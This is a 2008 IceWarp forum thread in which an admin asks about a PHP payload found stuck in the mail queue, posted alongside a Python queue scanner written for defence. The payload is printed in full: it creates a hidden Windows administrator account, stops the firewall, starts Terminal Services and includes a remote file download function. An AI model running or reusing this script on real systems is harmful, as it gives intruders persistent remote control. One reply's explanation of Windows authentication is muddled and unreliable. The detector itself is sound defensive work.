Hack attempt? (Full Version)

All Forums >> [Security] >> IceWarp Server Security Settings



triangulum -> Hack attempt? (10/13/2008 7:27:56 PM)

I've recently been getting a lot of messages stuck in the queue that are pure PHP code:


------------------------------6a52fd0313af
Content-Disposition: form-data; name="data"
ob_start();
phpinfo();
$phpinfo = array('phpinfo' => array());
if(preg_match_all('#(?:<h2>(?:<a name=".*?">)?(.*?)(?:</a>)?</h2>)|(?:<tr(?: class=".*?")?><t[hd](?: class=".*?")?>(.*?)\s*</t[hd]>(?:<t[hd](?: class=".*?")?>(.*?)\s*</t[hd]>(?:<t[hd](?: class=".*?")?>(.*?)\s*</t[hd]>)?)?</tr>)#s', ob_get_clean(), $matches, PREG_SET_ORDER))
   foreach($matches as $match)
       if(strlen($match[1]))
           $phpinfo[$match[1]] = array();
       elseif(isset($match[3]))
           $phpinfo[end(array_keys($phpinfo))][$match[2]] = isset($match[4]) ? array($match[3], $match[4]) : $match[3];
       else
           $phpinfo[end(array_keys($phpinfo))][] = $match[2];
echo "VULNERABLE\n";
echo "SYSTEM: ".$phpinfo['phpinfo']['System']."\n";
if($_ENV['OS'] == "Windows_NT") {
$login ="IWAM_".rand (10000, 99999);
$password = "-".rand (10000, 99999)."@";
echo "LOGIN: $login\n";
echo "PASSWORD: $password\n";
@system("net user $login $password /ADD /EXPIRES:NEVER /ACTIVE:YES");
@system("net localgroup administrators $login /add");
@system("net localgroup administrateurs $login /add");
@system("net localgroup administratorens $login /add");
@system("net stop sharedaccess");
@system("net start dcomlaunch");
@system("net start termservice");
taille("c:");
taille("d:");
taille("e:");
taille("f:");
taille("g:");
taille("h:");
taille("i:");
taille("j:");
taille("k:");
taille("l:");
taille("m:");
taille("n:"); 
taille("o:");
taille("p:");
taille("q:");
taille("r:");
taille("s:");
taille("t:");
taille("u:");
taille("v:");
taille("w:");
taille("x:");
taille("y:");
taille("z:");
} else {
taille("/");
}
function download($file,$link) {
@unlink($file);
$get = @file_get_contents($link);
$fhack = @fopen ($file, "a");
@fwrite ($fhack, $get);
@fclose ($fhack);
}
function taille($disk) {
// Enter the partition
$dt = disk_total_space($disk);
// Re-enter the partition
$df = disk_free_space($disk);
if(!$dt) { return; }
$used = $dt - $df;
echo "$disk Total: ".getSize($dt)." Free: ".getSize($df)." Used: ".getSize($used)."\n";
}
function getSize($taille, $units = "yes") {
$dimSize = array("octets", "Ko", "Mo", "Go", "To");
$i = 0;
while ($taille >= 1024) {
 $taille /= 1024;
 $i++;
}
return ($units == "yes") ? round($taille, 2) . " " . $dimSize[$i] : round($taille, 2);
}
------------------------------6a52fd0313af--


There is no from, to, or subject.  Looks like some kind of hack attempt.

Does anyone have any idea what this does + advice on how to block these?

Chris...




marciohumpris -> RE: Hack attempt? (10/18/2008 3:05:59 AM)

Wow, this is really strange. A message containing code? Where does the message come from? Seems the source code is commented in French.

Maybe send the original message to support and try to figure out a bit more. What do you mean they're stuck in the queue? In the /temp folder??

regards,
Marcio




triangulum -> RE: Hack attempt? (10/25/2008 4:44:50 AM)

Hi Marcio

They're sitting in the incoming queue and never get passed through anywhere.  There's no "from" or "to", and I can't link them to a specific connection.

I've been going through firewall logs but no luck yet.  I think I'll ask support as you suggest.




marciohumpris -> RE: Hack attempt? (10/31/2008 4:45:23 AM)

Hi, Triangulum

Quite strange!! Never seen this. I suggest you send to support so they can try to figure it out.

If you find out, please keep us posted, we're also curious :)

regards,
Marcio




IceWarpTR Ozcanyildiz -> RE: Hack attempt? (11/12/2008 6:17:52 AM)

Dear Chris;
in my experience this is a basic Windows system service hacking attempt written in PHP.
This code checks and tries to stop and start some services for remote desktop connections.
There are several codes which are trying to find authenticated user credentials, and by this way if you simply logged into the server by any username and password, the server assumes that user is a Windows user and the hacker can use this by stopping or starting some services. Simply, it starts a terminal service and by its username and password the hacker can log in. This means the user is in... If you use the Windows Authentication method, the web browser sends the logged-in user's credentials to the web server; by this way you can tell what Windows user is logged in. If you are using the PHP/ASP auth method, by this method no one can see the credentials.


Cheers.

Ozcan /Turkey
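A defender-side check for the kind of queue entry Chris describes, added here as an example and not code from IceWarp or from anyone in the thread: it flags a message that carries no From/To/Subject and whose body contains two or more of the commands seen in the payload above (account creation, admin group membership, firewall stop, Terminal Services start), while an ordinary mail that merely quotes the script, such as a copy forwarded to support as Marcio suggests, is left alone. The indicator names, the sample texts and the header-splitting logic are assumptions of this example.

```python
import re
# Indicators taken from the payload quoted in the thread, one regex per behaviour
# (account creation, admin group, firewall/Terminal Services, phpinfo, form-data).
INDICATORS = {
    "php_system_call": re.compile(r"@?system\s*\(", re.I),
    "windows_user_add": re.compile(r"net\s+user\s+\S+\s+\S+\s+/ADD", re.I),
    "admin_group_add": re.compile(r"net\s+localgroup\s+administr\w*\s+\S+\s+/add", re.I),
    "firewall_stop": re.compile(r"net\s+stop\s+sharedaccess", re.I),
    "termservice_start": re.compile(r"net\s+start\s+termservice", re.I),
    "phpinfo_probe": re.compile(r"\bphpinfo\s*\(\s*\)", re.I),
    "form_data_part": re.compile(r"^Content-Disposition:\s*form-data;", re.I | re.M),
}
ENVELOPE_HEADERS = ("from", "to", "subject")

def split_message(raw):
    """Return (headers, body); text not starting with a header block is all body."""
    raw = raw.replace("\r\n", "\n")
    head, sep, body = raw.partition("\n\n")
    if not sep:
        return {}, raw
    headers = {}
    for line in head.splitlines():
        if line[:1] in " \t":  # folded continuation of the previous header
            continue
        name, colon, value = line.partition(":")
        if not colon or not re.fullmatch(r"[!-9;-~]+", name):
            return {}, raw  # first block is not headers (e.g. a MIME boundary line)
        headers[name.lower()] = value.strip()
    return headers, body

def assess(raw):
    """Flag an entry with no envelope headers and at least two indicators; a normal
    mail that merely quotes the script (e.g. forwarded to support) is not flagged."""
    headers, body = split_message(raw)
    hits = sorted(name for name, rx in INDICATORS.items() if rx.search(body))
    missing = [h for h in ENVELOPE_HEADERS if h not in headers]
    flagged = len(missing) == len(ENVELOPE_HEADERS) and len(hits) >= 2
    return {"flagged": flagged, "indicators": hits, "missing_headers": missing}

# Constructed samples (not real queue files): a trimmed copy of the queued payload
# and the same text quoted inside an ordinary mail that does carry headers.
SAMPLE_PAYLOAD = (
    "------------------------------6a52fd0313af\n"
    'Content-Disposition: form-data; name="data"\nob_start();\nphpinfo();\n'
    '@system("net user $login $password /ADD /EXPIRES:NEVER /ACTIVE:YES");\n'
    '@system("net localgroup administrators $login /add");\n'
    '@system("net stop sharedaccess"); @system("net start termservice");\n'
    "------------------------------6a52fd0313af--\n")
SAMPLE_REPORT = ("From: admin@example.test\nTo: support@example.test\nSubject: odd queue "
                 "entry\n\nForwarding the queued message for analysis:\n\n" + SAMPLE_PAYLOAD)
```

Run `assess()` over each file in the incoming queue directory; the `missing_headers` and `indicators` fields give enough context to triage a hit without opening the raw file.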







2001 - 2008 © IceWarp